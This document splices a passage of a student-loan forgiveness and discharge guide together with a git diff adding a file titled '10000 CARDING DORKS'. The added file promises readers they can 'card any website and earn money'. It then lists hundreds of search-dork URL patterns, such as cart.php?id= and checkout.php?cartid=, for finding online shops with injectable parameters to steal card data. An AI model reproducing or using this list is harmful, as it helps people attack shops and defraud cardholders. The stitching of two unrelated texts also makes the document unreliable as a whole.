605.773.2679; +email jacob.parsons@state.sd.us. +Teach For Texas Loan Forgiveness +To Be Eligible … +You must teach in Texas at a designated subject shortage area, which are determined annually, +and in a designated low-income area school. +If you’re eligible, you can receive up to $2,500 for teaching service provided during the 2013- +2014 academic year. Funding for future academic periods has not yet been announced. +Loans That Qualify + Stafford loans + Grad PLUS loans + + Consolidation loans + Perkins loans +Next Steps +Applications are emailed to eligible teachers. +Texas Physician Education Loan Repayment Program +To Be Eligible … +Eligible physicians in Texas who commit to serve for at least 4 years in a health professional +shortage area may receive up to $160,000 for their 4-year commitment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Loans that are subject to repayment through another student loan repayment or forgiveness +program do not qualify. +Next Steps +You can download an application here. +Nurses For Wisconsin Initiative +To Be Eligible … +This initiative awards pre- and post-doctoral fellowships to qualified nurses who enroll in a Ph.D. +program at the University of Wisconsin Milwaukee or Madison or DNP program at the University +of Wisconsin Oshkosh, Eau-Claire, Madison, or Milwaukee. Those who are awarded the +fellowship and make a 3-year commitment to a faculty position may receive up to $50,000 +toward repaying their student loans. +Loans That Qualify + Stafford loans + Perkins loans + Federal consolidation loans +Next Steps +Contact one of the participating schools to learn more and to apply. +Wyoming Healthcare Professional Loan Repayment Program + +To Be Eligible … +You must be a physician, health care professional, or dentist who works full time in Wyoming +and treats Medicare, Medicaid, and Kid Care eligible patients. +Physicians and dentists may receive up to $30,000 per year for 3 years. All other health care +professionals may receive up to $10,000 each year for 3 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +Applications are only accepted during certain times of the year. If they are currently available, +you can find them here. + +Part Three: Loan Discharge Options + +Closed Schools/School Error +Borrowers may be eligible to have their loans discharged if their school closed while they were +attending it or within 120 days of leaving it. They may also be eligible if they withdrew from +school and were not refunded the correct amount. Borrowers are only eligible if they received +their loans on or after January 1, 1986. +Closed School Discharge +To Be Eligible … +This program is for borrowers who could not complete their program of study because the +school closed while they were enrolled or within 120 days of their attendance. If you were +offered a Teach-Out Program and did not accept or completed your program of studies at +another institution, you are not eligible. +If you meet the requirements, you are eligible to have 100% of the loans you took out for that +program forgiven—including any amounts you’ve already paid. +Loans That Qualify + Stafford loans + Consolidation loans + Parent PLUS loans + Grad PLUS loans + Perkins loans +Next Steps +To receive an application for a closed school discharge, you must contact your loan servicer. If +you have questions regarding your closed school, contact the appropriate person here. +Unpaid Refund Discharge +To Be Eligible … +This is for borrowers who withdrew from school and the school should have returned all or a +portion of their loans to the federal government and did not. You may be eligible for this whether +your school is open or closed. +If you meet the requirements, you are eligible to receive up to the amount that was originally +supposed to be refunded and was not discharged. +Loans That Qualify + Stafford loans + Consolidation loans + + Parent PLUS loans + Grad PLUS loans +Next Steps +To see if you are eligible, contact the school you withdrew from and request their federal aid +refund policy. If you did not follow the school’s posted withdrawal procedures, you may not be +eligible for a refund. You should also contact your loan servicer for more information. +Disaster +This section features a discharge option for victims of September 11, 2001. +Spouses And Parents Of Victims Of September 11, 2001, Discharge +To Be Eligible … +This discharge is available to the spouses of eligible public servants (police officers, firefighters, +Armed Forces, or other safety and rescue personnel) or other eligible victims who died or +became permanently and totally disabled due to physical injuries suffered in the September 11 +attacks. +If you meet these requirements, you are eligible to earn back 100% of the loan amount you +owed on September 11, 2001. +Loans That Qualify + Stafford loans + Parent PLUS loans + Grad PLUS loans + Perkins loans + Consolidation loans made to pay off loan amounts that were owed on September 11, +2001 +Next Steps +If you are eligible for this form of forgiveness, access the application here. +Financial Hardship +The following options are for borrowers who face financial hardship based on income or debt. +Bankruptcy +To Be Eligible … +In rare cases, borrowers may be eligible to have their student loans discharged due to +bankruptcy. You will likely need to prove to a bankruptcy judge that repaying your loans would +be an undue hardship. This standard generally requires you to show that there is no likelihood + +of any future ability to repay. As a result, it can be difficult to discharge federal student loans +through bankruptcy—but not impossible. +If you are eligible for this type of discharge, you can have up to 100% of your loan’s amount +forgiven. You may also regain eligibility for federal student aid if you previously lost it. +Loans That Qualify + Stafford loans + Parent PLUS loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +You must apply for this type of discharge in an adversary proceeding in bankruptcy court, so +consult a qualified bankruptcy attorney first. To learn how to go about doing this, look here. +Income-Based Repayment +To Be Eligible … +You must make 25 years of eligible payments or 300 payments under the income-based +repayment (IBR) program. Only payments made on or after July 1, 2009, count. +Not all borrowers qualify for IBR. To qualify, you must have a partial financial hardship— +meaning that payments to your eligible loans exceed 15% of your discretionary income. IBR +caps the maximum monthly payment at 15% of your discretionary income. This is the difference +between your AGI and 150% of the annual poverty guideline for your family size and state. +If you are eligible, you can have up to 100% of your outstanding balance forgiven after 25 years +(10 if you work for a public service or nonprofit employer). +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans, except loans that include Parent PLUS loans +Next Steps +To apply for IBR, you need to submit two forms to your servicer: an application and an IRS Tax +Form 4506-T. +Income-Contingent Repayment +To Be Eligible … + +You must make 25 years of eligible payments or 300 payments under the income-contingent +repayment (ICR) program. +Payments are calculated each year and are based on your annual income (this includes your +spouse’s income if you file jointly), family size, and the total amount of your federal student +loans. Payments are capped at 20% of your discretionary income. +If you are eligible, you can have up to 100% of your outstanding balance forgiven after 25 years +(10 if you work for a public service or nonprofit employer). +Loans That Qualify + Direct Stafford loans + Direct Grad PLUS loans + Direct Consolidation loans (including those with Parent PLUS loans) +Next Steps +To apply for ICR, sign in to studentloans.gov and complete a request form. +Pay As You Earn +To Be Eligible … +You must be a new Direct Loan borrower as of October 1, 2007, with a disbursement made +after October 1, 2011. Any Direct Consolidation loan made on or after October 1, 2011, that +does not include a Parent PLUS loan or a loan made prior to October 1, 2007 is eligible. +You must make 20 years of payments under the Pay As You Earn repayment plan (or 10 years +of payments if you work for a public service or nonprofit employer). Not all borrowers qualify for +Pay As You Earn. To qualify, you must have a partial financial hardship—meaning payments to +your eligible loans exceed 10% of your discretionary income. Pay As You Earn caps your +maximum monthly payment at 10% of your discretionary income (the difference between your +AGI and 150% of the annual poverty guideline for your family size and state). +If you are eligible, you can have up to 100% of your outstanding balance (after 240 eligible +payments) forgiven. +Loans That Qualify + Direct Stafford loans + Direct Grad PLUS loans + Direct Consolidation loans, except those that include a Parent PLUS loan or a loan +made prior to October 1, 2007 +Next Steps +To apply for Pay As You Earn forgiveness, sign in to studentloans.gov and complete a request +form. + +Fraud +You may be eligible to have 100% of your loan discharged if someone fraudulently obtained the +loan in your name. This includes identity theft and false certification. Forgery is another kind of +fraud addressed in our links and references section. +False Certification Due To Identity Theft +To Be Eligible … +A person must have been convicted of borrowing the student loans in your name, and you must +not have received any benefit from the loans. Generally, you must also file and submit a police +report and various other evidence of identity theft as requested by the loan holder and/or the +U.S. Department of Education. In addition, you must be willing to assist in any proceedings +related to the investigation and/or prosecution of the identity theft. This type of discharge is only +for loans received after July 1, 2006. +If you meet the requirements, you are eligible to have up to 100% of your student loan +discharged. +Loans That Qualify + Stafford loans + Grad PLUS loans + Parent PLUS loans + Consolidation loans + Perkins loans +Next Steps +To discharge your loans due to identity theft, you will need to certify that you did not authorize or +receive benefit from the loans in any way. You will also need to provide six signature samples +(at least three from around the time that the promissory note for the loan was signed) and a +copy of the judgment stating that you were a victim of identity theft and that the person +borrowed the student loan in your name. +False Loan Certification +To Be Eligible … +This discharge is for borrowers whose schools falsely certified their eligibility for a loan. This can +be caused by a school official falsely signing the borrower’s name on a loan application or +master promissory note, which resulted in the borrower not benefitting from the funds. This is +called a false certification due to unauthorized signature. +False certification also occurs when a school admits a student even though the student did not +meet the requirements of admission. In this instance, the borrower did not have the ability to +benefit from the education received. This is called a false certification due to ability to benefit. + +The final cause of false loan certification is disqualifying status, meaning the student is unable to +meet the legal requirements for employment in the student’s state of residence in the +occupation for which the program of study was intended due to age (upon completion of +training), physical or mental condition, criminal record, or other reason. At the time the loan was +issued, this disqualifying status must have existed and the school must have been aware of it. +This discharge option is only for loans received on or after January 1, 1986. +If you meet these requirements, you are eligible to receive up to 100% of your federal student +loan discharged. +Loans That Qualify + Stafford loans + Grad PLUS loans + Parent PLUS loans + Consolidation loans +Next Steps +To apply for this type of discharge: + Fill out this form for the false certification due to unauthorized signature and submit to +your loan holder. + Fill out this form for the false certification due to ability to benefit and submit to your loan +holder. + Fill out this form for the disqualifying status and submit it to your loan holder. +Medical +The following options are for borrowers who suffer from physical or mental impairments or have +died. +Death +To Be Eligible … +In the unfortunate case of the passing of the borrower, the borrower’s family can have the +borrower’s loans discharged. +Parent PLUS loans can be discharged if the borrower (the parent) dies or if the student on +whose behalf the loan was borrowed dies. +In the case of spousal Consolidation loans, only the portion of the loan attributed to the +deceased borrower can be discharged. +If you meet these requirements, you are eligible to receive up to 100% of your remaining +balance discharged. In addition, payments made on behalf of the borrower after the borrower’s +death will be refunded. + +Loans That Qualify + Stafford loans + Grad PLUS loans + Parent PLUS loans + Consolidation loans + Perkins loans +Next Steps +You must send an original or certified copy of the death certificate (or a photocopy of either) to +all of the borrower’s loan holders to discharge the loans. +Total And Permanent Disability +To Be Eligible … +A physician must certify that the borrower is unable to engage in substantial gainful activity due +to a physical or mental impairment. This impairment must be expected to result in death or last +for a continuous period of at least 60 months, or it must have already lasted for a continuous +period of at least 60 months. +Any remaining balance on your federal student loans will be discharged from the date that your +physician certifies your application. +The Secretary of Veteran Affairs (VA) can also certify the borrower to be unemployable due to a +service-connected disability. +If the VA certified your application, any federal student loan amounts owed after the date of the +service-related injury will be discharged, and any payments you made after your injury would be +refunded to you. +Borrowers may also be eligible for discharge if they have been certified as disabled by the +Social Security Administration (SSA) where the notice of award for Social Security Disability +Insurance (SSDI) or Supplemental Security Income (SSI) benefits indicates that the borrower’s +next scheduled disability review will be within 5 to 7 years. +If you were approved due to the SSA determination, any remaining balance on your federal +student loans would be discharged as of the date the SSA determination is received by the +Department of Education. +You must return any loan or TEACH Grant disbursements made after the TPD disability +approval within 120 days. +Loans That Qualify + Stafford loans + Grad PLUS loans + Parent PLUS loans + + Consolidation loans + Perkins loans +Next Steps +To apply for this discharge, complete this form and contact your loan holder. + +Part Four: Other Useful Stuff + +Glossary +Trying to figure out what some of this student loan lingo actually means? You came to the right +place. +Bankruptcy: A process by which some or many of your debts can be discharged—meaning +you won’t have to pay them. However, it can come with some major costs, like giving up some +of your assets (such as your home, car, etc.) Most importantly, student loans can be difficult to +discharge through bankruptcy. +Discharge: The cancellation of a student loan debt due to certain rare circumstances, such as a +school closure, the death of the borrower, or total and permanent disability. +Direct Loan Program (DL): The most common federal loan program. With Direct loans, the +federal government lends money directly to students, instead of going through a private bank +(see FFELP). DL offers subsidized and unsubsidized Direct Stafford loans, federal Direct +Consolidation loans, and Direct PLUS loans. As of June 30, 2010, all new federal student loans +are Direct loans. +Federal Family Education Loan Program (FFELP): Prior to July 1, 2010, the Federal Family +Education Loan Program (FFELP) was an alternative way to get Stafford, PLUS, SLS, and +Consolidation loans. Private lenders originated FFELP loans with government backing. As of +June 30, 2010, new FFELP loans are no longer issued. +Forgiveness: The cancellation of a loan’s remaining balance—or a portion of the balance—by +the federal government. +Loan Repayment Plans + Income-Based Repayment (IBR): Plan that sets your payment amounts based on your +income and family size and caps your payments at 15% of your discretionary income if +you are eligible. After 25 years (10 if you work for a public service or nonprofit employer) +and 300 eligible payments, any remaining balance may be forgiven but would be +taxable. + Income-Contingent Repayment (ICR): Similar to IBR, but caps your payments at 20% +of your discretionary income and is available for Direct loan borrowers only. After 25 +years (10 if you work for a public service or nonprofit employer) and 300 eligible +payments, any remaining balance may be forgiven but would be taxable. + Pay As You Earn Repayment: Another plan similar to IBR that allows you to make +payments of no more than 10% of your discretionary income if you qualify. After 25 +years (10 if you work for a public service or nonprofit employer) and 240 eligible +payments, any remaining balance may be forgiven but would be taxable. +Types Of Loans + Consolidation loans: Loans that combine one or more pre-existing loans into one new +loan and (generally) a longer repayment term. + Health Professions Student Loans (HPSL): Loans for health care professionals +specializing in many areas other than primary care or nursing. HPSL are part of Title VII +of the Public Health Service Act. + + Institutional loans: Non-federal loans provided directly by your school. + Nursing Student Loans (NSL): Loans for nursing professionals looking to supplement +their financial aid. NSL are part of Title VIII of the Public Health Service Act. + Stafford loans: The most common federal student loans. Stafford loans can be either +subsidized or unsubsidized. + Supplemental Loans for Students (SLS): Federal loans for financially independent +students. This program was eliminated in 1994 with the creation of unsubsidized Stafford +loans. + Perkins loans: Federal loans that schools award to their students who have exceptional +financial need. + PLUS loans: Loans borrowed by parents of eligible dependent students (Parent PLUS +loans) or by graduate students themselves (Grad PLUS loans) typically after exhausting +their Stafford loan awards. + Private student loans: Non-federal loans provided by private lenders that can help you +pay for school, if you don’t have enough other financial aid. +Links And References + Further Information On Federal Loan Discharge Programs + Further Information On Federal Loan Forgiveness Programs + Loan Cancellation And Discharge Forms + Further Information On Forgery (Contact your local police department and refer to you +state’s laws.) + +About SALT +SALT is a free, nonprofit-backed, educational resource that provides simple, smart, +personalized ways to take control of your student debt and manage your finances. SALT was +created by American Student Assistance® (ASA), a nonprofit organization with 50+ years of +experience helping people make better decisions about financing their education and repaying +student loans. Learn more at saltmoney.org. diff --git a/10000 CARDING DORKS (1)_txt.md b/10000 CARDING DORKS (1)_txt.md new file mode 100644 index 0000000..3b01213 --- /dev/null +++ b/10000 CARDING DORKS (1)_txt.md @@ -0,0 +1,5727 @@ +# 10000 CARDING DORKS (1) + + +--- + +Wednesday, February 1, 2017 + +Hello today i am giving you latest carding dorks 2017 and 2018.By These you can Card any website and earn money. + +Carding is a term describing the trafficking of credit card, bank account and other personal information online as well as related fraud services.Carding activities also encompass procurement of details, and money laundering techniques. Modern carding sites have been described as full-service commercial entities. + +What Is Dorks? + +A Google dork is an employee who unknowingly exposes sensitive corporate information on the Internet. The word dork is slang for a slow-witted or in-ept person. + +Google dorks put corporate information at risk because they unwittingly create back doors that allow an attacker to enter a network without permission and/or gain access to unauthorized + +10000+ Latest Carding Dorks 2017 and 2018 + +accinfo.php?cartId= +acclogin.php?cartID= +add.php?bookid= +add_cart.php?num= +addcart.php? +addItem.php +add-to-cart.php?ID= +addToCart.php?idProduct= +addtomylist.php?ProdId= +adminEditProductFields.php?intProdID= +advSearch_h.php?idCategory= +affiliate.php?ID= +affiliate-agreement.cfm?storeid= +affiliates.php?id= +ancillary.php?ID= + +archive.php?id= +article.php?id= +phpx?PageID +basket.php?id= +Book.php?bookID= +book_list.php?bookid= +book_view.php?bookid= +BookDetails.php?ID= +browse.php?catid= +browse_item_details.php +Browse_Item_Details.php?Store_Id= +buy.php? +buy.php?bookid= +bycategory.php?id= +cardinfo.php?card= +cart.php?action= +cart.php?cart_id= +cart.php?id= +cart_additem.php?id= +cart_validate.php?id= +cartadd.php?id= +cat.php?iCat= +catalog.php +catalog.php?CatalogID= +catalog_item.php?ID= +catalog_main.php?catid= +category.php +category.php?catid= + +category_list.php?id= +categorydisplay.php?catid= +checkout.php?cartid= +checkout.php?UserID= +checkout_confirmed.php?order_id= +checkout1.php?cartid= +comersus_listCategoriesAndProducts.php?idCategory= +comersus_optEmailToFriendForm.php?idProduct= +comersus_optReviewReadExec.php?idProduct= +comersus_viewItem.php?idProduct= +comments_form.php?ID= +contact.php?cartId= +content.php?id= +customerService.php?****ID1= +default.php?catID= +description.php?bookid= +details.php?BookID= +details.php?Press_Release_ID= +details.php?Product_ID= +details.php?Service_ID= +display_item.php?id= +displayproducts.php +downloadTrial.php?intProdID= +emailproduct.php?itemid= +emailToFriend.php?idProduct= +events.php?ID= +faq.php?cartID= + +faq_list.php?id= +faqs.php?id= +feedback.php?title= +freedownload.php?bookid= +fullDisplay.php?item= +getbook.php?bookid= +GetItems.php?itemid= +giftDetail.php?id= +help.php?CartId= +home.php?id= +index.php?cart= +index.php?cartID= +index.php?ID= +info.php?ID= +item.php?eid= +item.php?item_id= +item.php?itemid= +item.php?model= +item.php?prodtype= +item.php?shopcd= +item_details.php?catid= +item_list.php?maingroup + +item_show.php?code_no= +itemDesc.php?CartId= +itemdetail.php?item= +itemdetails.php?catalogid= +learnmore.php?cartID= +links.php?catid= +list.php?bookid= +List.php?CatID= +listcategoriesandproducts.php?idCategory= +modline.php?id= +myaccount.php?catid= +news.php?id= +order.php?BookID= +order.php?id= +order.php?item_ID= +OrderForm.php?Cart= +page.php?PartID= +payment.php?CartID= +pdetail.php?item_id= +powersearch.php?CartId= +price.php +privacy.php?cartID= +prodbycat.php?intCatalogID= +prodetails.php?prodid= +prodlist.php?catid= +product.php?bookID= +product.php?intProdID= +product_info.php?item_id= +productDetails.php?idProduct= +productDisplay.php +productinfo.php?item= +productlist.php?ViewType=Category&CategoryID= +productpage.php +products.php?ID= +products.php?keyword= +products_category.php?CategoryID= +products_detail.php?CategoryID= +productsByCategory.php?intCatalogID= +prodView.php?idProduct= +promo.php?id= +promotion.php?catid= +pview.php?Item= +resellers.php?idCategory= +results.php?cat= +savecart.php?CartId= +search.php?CartID= +searchcat.php?search_id= +Select_Item.php?id= +Services.php?ID= +shippinginfo.php?CartId= +shop.php?a= + +shop.php?action= +shop.php?bookid= +shop.php?cartID= +shop_details.php?prodid= +shopaddtocart.php +shopaddtocart.php?catalogid= +shopbasket.php?bookid= +shopbycategory.php?catid= +shopcart.php?title= +shopcreatorder.php +shopcurrency.php?cid= +shopdc.php?bookid= +shopdisplaycategories.php +shopdisplayproduct.php?catalogid= +shopdisplayproducts.php +shopexd.php +shopexd.php?catalogid= +shopping_basket.php?cartID= +shopprojectlogin.php +shopquery.php?catalogid= +shopremoveitem.php?cartid= +shopreviewadd.php?id= +shopreviewlist.php?id= +ShopSearch.php?CategoryID= +shoptellafriend.php?id= +shopthanks.php +shopwelcome.php?title= +show_item.php?id= +show_item_details.php?item_id= +showbook.php?bookid= +showStore.php?catID= +shprodde.php?SKU= +specials.php?id= +store.php?id= +store_bycat.php?id= +store_listing.php?id= +Store_ViewProducts.php?Cat= +store-details.php?id= +storefront.php?id= +storefronts.php?title= +storeitem.php?item= +StoreRedirect.php?ID= +subcategories.php?id= +tek9.php? +template.php?Action=Item&pid= +topic.php?ID= +tuangou.php?bookid= +type.php?iType= +updatebasket.php?bookid= + +updates.php?ID= +view.php?cid= +view_cart.php?title= +view_detail.php?ID= +viewcart.php?CartId= +viewCart.php?userID= +viewCat_h.php?idCategory= +viewevent.php?EventID= +viewitem.php?recor= +viewPrd.php?idcategory= +ViewProduct.php?misc= +voteList.php?item_ID= +whatsnew.php?idCategory= +WsAncillary.php?ID= +WsPages.php?ID=noticiasDetalle.php?xid= +sitio/item.php?idcd= +index.php?site= +de/content.php?page_id= +gallerysort.php?iid= +products.php?type= +event.php?id= +showfeature.php?id= +home.php?ID= +tas/event.php?id= +profile.php?id= +details.php?id= +past-event.php?id= +index.php?action= +site/products.php?prodid= +page.php?pId= +resources/vulnerabilities_list.php?id= +site.php?id= +products/index.php?rangeid= +global_projects.php?cid= +publications/view.php?id= +display_page.php?id= +pages.php?ID= +lmsrecords_cd.php?cdid= +product.php?prd= +cat/?catid= +products/product-list.php?id= +debate-detail.php?id= +cbmer/congres/page.php?LAN= +content.php?id= +news.php?ID= +photogallery.php?id= +index.php?id= +product/product.php?product_no= +nyheder.htm?show= +book.php?ID= +print.php?id= +detail.php?id= +book.php?id= +content.php?PID= +more_detail.php?id= +content.php?id= +view_items.php?id= +view_author.php?id= +main.php?id= +english/fonction/print.php?id= +magazines/adult_magazine_single_page.php?magid= +product_details.php?prodid= +magazines/adult_magazine_full_year.php?magid= +products/card.php?prodID= +catalog/product.php?cat_id= +e_board/modifyform.html?code= +community/calendar-event-fr.php?id= +products.php?p= +news.php?id= +view/7/9628/1.html?reply= +product_details.php?prodid= + +catalog/product.php?pid= +rating.php?id= +?page= +catalog/main.php?cat_id= +index.php?page= +detail.php?prodid= +products/product.php?pid= +news.php?id= +book_detail.php?BookID= +catalog/main.php?cat_id= +catalog/main.php?cat_id= +default.php?cPath= +catalog/main.php?cat_id= +catalog/main.php?cat_id= +category.php?catid= +categories.php?cat= +categories.php?cat= +detail.php?prodID= +detail.php?id= +category.php?id= +hm/inside.php?id= +index.php?area_id= +gallery.php?id= +products.php?cat= +products.php?cat= +media/pr.php?id= +books/book.php?proj_nr= +products/card.php?prodID= +general.php?id= +news.php?t= +usb/devices/showdev.php?id= +content/detail.php?id= +templet.php?acticle_id= +news/news/title_show.php?id= +product.php?id= +index.php?url= +cryolab/content.php?cid= +ls.php?id= +s.php?w= +abroad/page.php?cid= +bayer/dtnews.php?id= +news/temp.php?id= +index.php?url= +book/bookcover.php?bookid= +index.php/en/component/pvm/?view= +product/list.php?pid= +cats.php?cat= +software_categories.php?cat_id= +print.php?sid= +docDetail.aspx?chnum= +index.php?section= +index.php?page= +index.php?page= +en/publications.php?id= +events/detail.php?ID= +forum/profile.php?id= +media/pr.php?id= +content.php?ID= +cloudbank/detail.php?ID= +pages.php?id= +news.php?id= +beitrag_D.php?id= +content/index.php?id= +index.php?i= +?action= +index.php?page= +beitrag_F.php?id= +index.php?pageid= +page.php?modul= +detail.php?id= +index.php?w= +index.php?modus= +news.php?id= +news.php?id= +aktuelles/meldungen-detail.php?id= +item.php?id= +obio/detail.php?id= +page/de/produkte/produkte.php?prodID= +packages_display.php?ref= +shop/index.php?cPath= +modules.php?bookid= +product-range.php?rangeID= +en/news/fullnews.php?newsid= +deal_coupon.php?cat_id= +show.php?id= +blog/index.php?idBlog= +redaktion/whiteteeth/detail.php?nr= +HistoryStore/pages/item.php?itemID= +aktuelles/veranstaltungen/detail.php?id= +tecdaten/showdetail.php?prodid= +?id= +rating/stat.php?id= +content.php?id= +viewapp.php?id= +item.php?id= +news/newsitem.php?newsID= +FernandFaerie/index.php?c= +show.php?id= +?cat= +categories.php?cat= +category.php?c= +product_info.php?id= +prod.php?cat= +store/product.php?productid= +browsepr.php?pr= +product-list.php?cid= +products.php?cat_id= +product.php?ItemID= +category.php?c= +main.php?id= +article.php?id= +showproduct.php?productId= +view_item.php?item= +skunkworks/content.php?id= +index.php?id= +item_show.php?id= +publications.php?Id= + +index.php?t= +view_items.php?id= +portafolio/portafolio.php?id= +YZboard/view.php?id= +index_en.php?ref= +index_en.php?ref= +category.php?id_category= +main.php?id= +main.php?id= +calendar/event.php?id= +default.php?cPath= +pages/print.php?id= +index.php?pg_t= +_news/news.php?id= +forum/showProfile.php?id= +fr/commande-liste-categorie.php?panier= +downloads/shambler.php?id= +sinformer/n/imprimer.php?id= +More_Details.php?id= +directory/contenu.php?id_cat= +properties.php?id_cat= +forum/showProfile.php?id= +downloads/category.php?c= +index.php?cat= +product_info.php?products_id= +product_info.php?products_id= +product-list.php?category_id= +detail.php?siteid= +projects/event.php?id= +view_items.php?id= +more_details.php?id= +melbourne_details.php?id= +more_details.php?id= +detail.php?id= +more_details.php?id= +home.php?cat= +idlechat/message.php?id= +detail.php?id= +print.php?sid= +more_details.php?id= +default.php?cPath= +events/event.php?id= +brand.php?id= +toynbeestudios/content.php?id= +show-book.php?id= +more_details.php?id= +store/default.php?cPath= +property.php?id= +product_details.php?id= +more_details.php?id= +view-event.php?id= +content.php?id= +book.php?id= +page/venue.php?id= +print.php?sid= +colourpointeducational/more_details.php?id= +print.php?sid= +browse/book.php?journalID= +section.php?section= +bookDetails.php?id= +profiles/profile.php?profileid= +event.php?id= +gallery.php?id= +category.php?CID= +corporate/newsreleases_more.php?id= +print.php?id= +view_items.php?id= +more_details.php?id= +county-facts/diary/vcsgen.php?id= +idlechat/message.php?id= +podcast/item.php?pid= +products.php?act= +details.php?prodId= +socsci/events/full_details.php?id= +ourblog.php?categoryid= +mall/more.php?ProdID= +archive/get.php?message_id= +review/review_form.php?item_id= +english/publicproducts.php?groupid= +news_and_notices.php?news_id= +rounds-detail.php?id= +gig.php?id= +board/view.php?no= +index.php?modus= +news_item.php?id= +rss.php?cat= +products/product.php?id= +details.php?ProdID= +els_/product/product.php?id= +store/description.php?iddesc= +socsci/news_items/full_story.php?id= +modules/forum/index.php?topic_id= +feature.php?id= +products/Blitzball.htm?id= +profile_print.php?id= +questions.php?questionid= +html/scoutnew.php?prodid= +main/index.php?action= +********.php?cid= +********.php?cid= +news.php?type= +index.php?page= +viewthread.php?tid= +summary.php?PID= +news/latest_news.php?cat_id= +index.php?cPath= +category.php?CID= +index.php?pid= +more_details.php?id= +specials.php?osCsid= +search/display.php?BookID= +articles.php?id= +print.php?sid= +page.php?id= +more_details.php?id= +newsite/pdf_show.php?id= +shop/category.php?cat_id= +shopcafe-shop-product.php?bookId= +shop/books_detail.php?bookID= +index.php?cPath= +more_details.php?id= +news.php?id= +more_details.php?id= +shop/books_detail.php?bookID= +more_details.php?id= +blog.php?blog= +index.php?pid= +prodotti.php?id_cat= +category.php?CID= +more_details.php?id= +poem_list.php?bookID= +more_details.php?id= +content.php?categoryId= +authorDetails.php?bookID= +press_release.php?id= +item_list.php?cat_id= +colourpointeducational/more_details.php?id= +index.php?pid= +download.php?id= +shop/category.php?cat_id= +i-know/content.php?page= +store/index.php?cat_id= +yacht_search/yacht_view.php?pid= +pharmaxim/category.php?cid= +print.php?sid= +specials.php?osCsid= +store.php?cat_id= +category.php?cid= +displayrange.php?rangeid= +product.php?id= +csc/news-details.php?cat= +products-display-details.php?prodid= +stockists_list.php?area_id= +news/newsitem.php?newsID= +index.php?pid= +newsitem.php?newsid= +category.php?id= +news/newsitem.php?newsID= +details.php?prodId= +publications/publication.php?id= +purelydiamond/products/category.php?cat= +category.php?cid= +product/detail.php?id= +news/newsitem.php?newsID= +details.php?prodID= +item.php?item_id= +edition.php?area_id= +page.php?area_id= +view_newsletter.php?id= +library.php?cat= +categories.php?cat= +page.php?area_id= +categories.php?cat= +publications.php?id= +item.php?sub_id= +page.php?area_id= +page.php?area_id= +category.php?catid= + +content.php?cID= +newsitem.php?newsid= +frontend/category.php?id_category= +news/newsitem.php?newsID= +things-to-do/detail.php?id= +page.php?area_id= +page.php?area_id= +listing.php?cat= +item.php?iid= +customer/home.php?cat= +staff/publications.php?sn= +news/newsitem.php?newsID= +library.php?cat= +main/index.php?uid= +library.php?cat= +shop/eventshop/product_detail.php?itemid= +news/newsitem.php?newsID= +news/newsitem.php?newsID= +library.php?cat= +FullStory.php?Id= +publications.php?ID= +publications/book_reviews/full_review.php?id= +newsitem.php?newsID= +newsItem.php?newsId= +site/en/list_service.php?cat= +page.php?area_id= +product.php?ProductID= +releases_headlines_details.php?id= +product.php?shopprodid= +product.php?productid= +product.php?product= +product.php?product_id= +productlist.php?id= +product.php?shopprodid= +garden_equipment/pest-weed-control/product.php?pr= +product.php?shopprodid= +browsepr.php?pr= +productlist.php?id= +kshop/product.php?productid= +product.php?pid= +showproduct.php?prodid= +product.php?productid= +productlist.php?id= +index.php?pageId= +productlist.php?tid= +product-list.php?id= +onlinesales/product.php?product_id= +garden_equipment/Fruit-Cage/product.php?pr= +product.php?shopprodid= +product_info.php?products_id= +productlist.php?tid= +showsub.php?id= +productlist.php?fid= +products.php?cat= +products.php?cat= +product-list.php?id= +product.php?sku= +store/product.php?productid= +products.php?cat= +productList.php?cat= +product_detail.php?product_id= +product.php?pid= +wiki/pmwiki.php?page****= +summary.php?PID= +productlist.php?grpid= +cart/product.php?productid= +db/CART/product_details.php?product_id= +ProductList.php?id= +products/product.php?id= +product.php?shopprodid= +product_info.php?products_id= +product_ranges_view.php?ID= +cei/cedb/projdetail.php?projID= +products.php?DepartmentID= +product.php?shopprodid= +product.php?shopprodid= +product_info.php?products_id= +index.php?news= +education/content.php?page= +Interior/productlist.php?id= +products.php?categoryID= +modules.php?****= +message/comment_threads.php?postID= +artist_art.php?id= +products.php?cat= +index.php?option= +ov_tv.php?item= +index.php?lang= +showproduct.php?cat= +index.php?lang= +product.php?bid= +product.php?bid= +cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId= +item_show.php?lid= +?pagerequested= +downloads.php?id= +print.php?sid= +print.php?sid= +product.php?intProductID= +productList.php?id= +product.php?intProductID= +more_details.php?id= +more_details.php?id= +books.php?id= +index.php?offs= +mboard/replies.php?parent_id= +Computer Science.php?id= +news.php?id= +pdf_post.php?ID= +reviews.php?id= +art.php?id= +prod.php?cat= +event_info.php?p= +view_items.php?id= +home.php?cat= +item_book.php?CAT= +www/index.php?page= +schule/termine.php?view= +goods_detail.php?data= +storemanager/contents/item.php?page_code= +view_items.php?id= +customer/board.htm?mode= +help/com_view.html?code= +n_replyboard.php?typeboard= +eng_board/view.php?T****= +prev_results.php?prodID= +bbs/view.php?no= +gnu/?doc= +zb/view.php?uid= +global/product/product.php?gubun= +m_view.php?ps_db= +naboard/memo.php?bd= +bookmark/mybook/bookmark.php?bookPageNo= +board/board.html?table= +kboard/kboard.php?board= +order.asp?lotid= +english/board/view****.php?code= +goboard/front/board_view.php?code= +bbs/bbsView.php?id= +boardView.php?bbs= +eng/rgboard/view.php?&bbs_id= +product/product.php?cate= +content.php?p= +page.php?module= +?pid= +bookpage.php?id= +view_items.php?id= +index.php?pagina= +product.php?prodid= +notify/notify_form.php?topic_id= +php/index.php?id= +content.php?cid= +product.php?product_id= +constructies/product.php?id= +detail.php?id= +php/index.php?id= +index.php?section= +product.php?****= +show_bug.cgi?id= +detail.php?id= +bookpage.php?id= +product.php?id= +today.php?eventid= +main.php?item= +index.php?cPath= +news.php?id= +event.php?id= +print.php?sid= +news/news.php?id= +module/range/dutch_windmill_collection.php?rangeId= +print.php?sid= + +show_bug.cgi?id= +product_details.php?product_id= +products.php?groupid= +projdetails.php?id= +product.php?productid= +products.php?catid= +product.php?product_id= +product.php?prodid= +product.php?prodid= +newsitem.php?newsID= +newsitem.php?newsid= +profile.php?id= +********s_in_area.php?area_id= +productlist.php?id= +productsview.php?proid= +rss.php?cat= 